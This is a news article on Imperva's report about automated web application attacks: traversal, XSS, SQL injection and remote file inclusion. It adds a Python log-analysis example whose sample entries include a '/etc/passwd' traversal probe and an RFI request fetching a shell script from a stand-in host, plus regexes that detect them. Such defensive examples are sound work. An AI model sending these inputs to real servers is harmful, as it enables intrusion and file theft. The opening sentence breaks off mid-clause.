Automated Web attacks are prevalent, with Web applications being attacked or probed 27 times per hour on average, according to new research. At the height of these attacks,
The data, gathered over a six-month period by Redwood Shores, Calif.-based data security vendor Imperva Inc., sheds light on the proliferation of automated attack toolkits. The company's Web Application Attack Report was the result of an analysis conducted by its Application Defense Center (ADC) team, which observed attacks against 30 different applications from December 2010 to May 2011. ADC monitored over 10 million individual attacks, focusing on specific incidents to determine trends and draw general conclusions about automated Web attacks.
“We’ve seen reports that identify attacks, but those were mainly concerned with malware, phishing, spam or network attacks, nothing that is related to the application,” said Amichai Shulman, CTO and co-founder of Imperva, as well as lead researcher for ADC. “The question we wanted to answer is, ‘What are the vulnerabilities attackers are trying to exploit?’”
The “Unfab Four,” as the report labels them, are the four dominant attacks that comprise the vast majority of attacks targeting Web applications: directory traversal, cross-site scripting, SQL injection and remote file inclusion (RFI). Directory traversal and cross-site scripting were the most widely used attacks, making up almost 75% of all attack traffic.
Organizations need to focus more of their security effort on the application layer, where the majority of attacks are taking place, Shulman said. The report explains that attackers target Web applications to steal data and make a profit, and that automation, meaning the use of automated attack toolkits, prevails for that reason. Even if hackers don't see high success rates, at the end of the day they still earn some money, Shulman explained. "With automation, you don't have to do much to still see results."
Most of these automated attacks consist of two phases: scanning and exploiting. Attackers often use a different attack type for each phase, one to probe and scan and another to exploit the targets where probing and scanning succeeded. This combination of attacks provides the most value to the attacker and is very easy to automate.
“Directory traversal and RFI have a high degree of correlation between them,” Shulman said. “It looks as though the attacker is trying to map out the internal structure of the server with directory traversal, and then with that information, launching an RFI attack [to exploit].”
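The two-phase pattern Shulman describes is something a defender can look for in ordinary access logs. The following Python example, added here and not taken from the Imperva report, classifies request query parameters as directory-traversal or RFI attempts and flags any client whose traversal probes are followed by an RFI attempt; the log lines are constructed sample data, and the IP addresses and hostnames are placeholders.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed Common Log Format lines for illustration (not data from the report).
SAMPLE_LOG = """\
198.51.100.7 - - [12/Mar/2011:10:01:02 +0000] "GET /index.php?page=about HTTP/1.1" 200 512
203.0.113.5 - - [12/Mar/2011:10:01:03 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 404 221
203.0.113.5 - - [12/Mar/2011:10:01:04 +0000] "GET /index.php?page=..%2F..%2Fconfig.inc HTTP/1.1" 404 221
203.0.113.5 - - [12/Mar/2011:10:01:09 +0000] "GET /index.php?page=http://evil.example/shell.txt HTTP/1.1" 200 88
198.51.100.9 - - [12/Mar/2011:10:02:00 +0000] "GET /news.php?id=5 HTTP/1.1" 200 1024
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
TRAVERSAL_RE = re.compile(r'(^|[\\/])\.\.([\\/]|$)')   # a "../" or "..\" path segment
RFI_RE = re.compile(r'^(https?|ftp)://', re.IGNORECASE)  # parameter value that is a remote URL

def classify(request_target):
    """Return the labels ('traversal', 'rfi') that apply to one request target's query parameters."""
    labels = set()
    for _, value in parse_qsl(urlsplit(request_target).query, keep_blank_values=True):
        decoded = unquote(value)  # parse_qsl decoded once; a second pass catches double encoding
        if TRAVERSAL_RE.search(decoded):
            labels.add("traversal")
        if RFI_RE.match(decoded):
            labels.add("rfi")
    return labels

def correlate(log_text):
    """Flag clients whose traversal probing is later followed by an RFI attempt (the two-phase pattern)."""
    events = defaultdict(list)  # client IP -> ordered list of label sets
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            ip, _method, target, _status = m.groups()
            labels = classify(target)
            if labels:
                events[ip].append(labels)
    flagged = {}
    for ip, seq in events.items():
        probed = False
        for labels in seq:
            probed = probed or "traversal" in labels
            if probed and "rfi" in labels:
                flagged[ip] = "traversal probe followed by RFI attempt"
                break
    return flagged
```

Running `correlate(SAMPLE_LOG)` flags only the client that probed with traversal and then supplied a remote URL, while ordinary traffic from the other clients produces no labels.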
According to the report, the attack traffic was characterized by short peaks of high activity followed by longer periods of lighter activity. Shulman explained that during the lighter periods, attackers are compiling their lists of potential targets; the peaks represent the launching of attacks against those targets.
One of the key findings of the report is that there is no correlation between the popularity of a site and whether it was targeted. The hacker launching the attack doesn't care if it's a high-profile or low-profile site. "If it's out there and it's on the list, which is obtained through search engines, then you'll be attacked," Shulman said. "Whatever they succeed in compromising they'll make use of."
The report also explained that most of the monitored attacks came from within the United States. This is because the Web applications monitored are from the U.S. and it’s more effective for attackers to use machines originating from the same country as the target.
“We have seen huge numbers of application attacks being launched on a day-to-day basis,” Shulman said. “This is a clear and present danger. Attackers are going after applications all the time, yet even today most security budgets are focused on network and infrastructure security. So, clearly, there’s an imbalance of where the risk is and where the budget is. That’s one of the key items people should take from this report.”